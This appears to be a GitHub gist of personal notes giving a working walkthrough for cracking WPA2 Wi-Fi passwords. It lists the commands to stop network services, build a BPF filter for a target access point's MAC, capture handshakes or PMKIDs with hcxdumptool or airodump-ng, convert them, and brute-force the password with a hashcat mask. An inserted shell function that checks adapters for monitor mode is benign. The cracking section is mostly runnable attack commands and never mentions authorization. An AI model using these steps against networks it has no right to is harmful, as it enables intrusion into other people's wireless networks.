@rikka0w0
Last active April 20, 2024 13:34
Find out if your Wifi adapter supports monitor mode

Windows: run netsh wlan show wirelesscapabilities in an administrator cmd shell and look for Network monitor mode.

Linux: run iw list | grep -Fe "Supported interface modes" -n10 and look for * monitor in the Supported interface modes: section.
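As an added example (not part of the original gist), the POSIX shell function below does the Linux check for every adapter at once: it parses iw list output and reports, per Wiphy, whether monitor is listed under Supported interface modes. The iw list text embedded here is a constructed sample with two adapters.

```shell
#!/bin/sh
# Constructed sample of `iw list` output (two adapters): phy0 lists
# monitor under "Supported interface modes", phy1 does not. Real output
# indents with tabs; spaces are used here and parse the same way.
IW_LIST_SAMPLE='Wiphy phy0
    max # scan SSIDs: 4
    Supported interface modes:
         * IBSS
         * managed
         * AP
         * monitor
    Band 1:
        Capabilities: 0x1962
Wiphy phy1
    max # scan SSIDs: 4
    Supported interface modes:
         * managed
         * AP
    Band 1:
        Capabilities: 0x1962'

# Read `iw list` text on stdin and print "<phy> yes|no" for each Wiphy,
# where yes means monitor is one of its supported interface modes.
monitor_support() {
    awk '
        /^Wiphy / {                      # a new adapter section starts
            if (phy != "") print phy, has
            phy = $2; has = "no"; inmodes = 0; next
        }
        /Supported interface modes:/ { inmodes = 1; next }
        inmodes && $1 == "*" {           # a mode line such as "* monitor"
            if ($2 == "monitor") has = "yes"
            next
        }
        inmodes { inmodes = 0 }          # first non-mode line ends the list
        END { if (phy != "") print phy, has }
    '
}

# Exit 0 when the named adapter supports monitor mode, 1 otherwise.
# On a real system: iw list | has_monitor_mode phy0
has_monitor_mode() {
    monitor_support | grep -q "^$1 yes\$"
}

# Demo on the constructed sample: prints "phy0 yes" and "phy1 no".
printf '%s\n' "$IW_LIST_SAMPLE" | monitor_support
```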

In Kali Linux

I boot a live Kali 2024.1 on an 8G USB stick on an Acer ES1-531-P8NJ and install hcxdumptool and hcxtools from the official repo. The version of hcxdumptool from the repo is 6.3.1 as of 20240420.

Stop Wifi related services

sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant

Find the Wifi interface

iwconfig
iw list

Generate a BPF filter (based on the target Wifi address)

sudo tcpdump -i wlan0 wlan addr3 TA:RG:ET:__:_M:AC -ddd > attack.bpf

See also: ZerBea/hcxdumptool#420

The --bpfc option is not present in v6.3.1.

Capture packets

sudo hcxdumptool -i wlan0 -w dumpfile.pcapng --rds=1 --bpf=attack.bpf

Replace wlan0 with your Wifi interface name. Add -c 1a to listen on channel 1 only.

Convert to the hc22000 format that hashcat understands

hcxpcapngtool ./dumpfile.pcapng -o test.hc22000

View the hc22000 file content

hcxhashtool -i test.hc22000 --info=stdout

Brute force crack with hashcat (8-12 characters, letters and digits)

hashcat --hwmon-disable -m22000 -a3 -i -1 ?l?u?d .\test.hc22000 "?1?1?1?1?1?1?1?1?1?1?1?1"

I transferred the hc22000 file to my Windows PC and used hashcat (v6.2.6) to crack it.

Note

  1. hcxdumptool does not work on the internal Wifi of the Rasp Pi 4b.
  2. Hashcat self-test: hashcat -m1000 -a3 -i 42EF98F2E9B77304716D2AECA2F0BD96 ?a?a?a?a?a?a?a; the password should be *H4cK*.
  3. Packet capturing with airodump-ng seems to work on the Rasp Pi 4b. The commands are sudo airodump-ng wlan0mon -c 13 --bssid TA:RG:ET:__:_M:AC -w dumpfile and hcxpcapngtool dumpfile.cap -o test.hc22000.

References:

  1. ZerBea/hcxdumptool#329
  2. ZerBea/hcxdumptool#355
  3. https://www.hackers-arise.com/post/wi-fi-hacking-part-11-the-pmkid-attack
  4. https://node-security.com/posts/cracking-wpa2-with-hashcat/
  5. hashcat/hashcat#2923
  6. https://hashcat.net/forum/thread-10253.html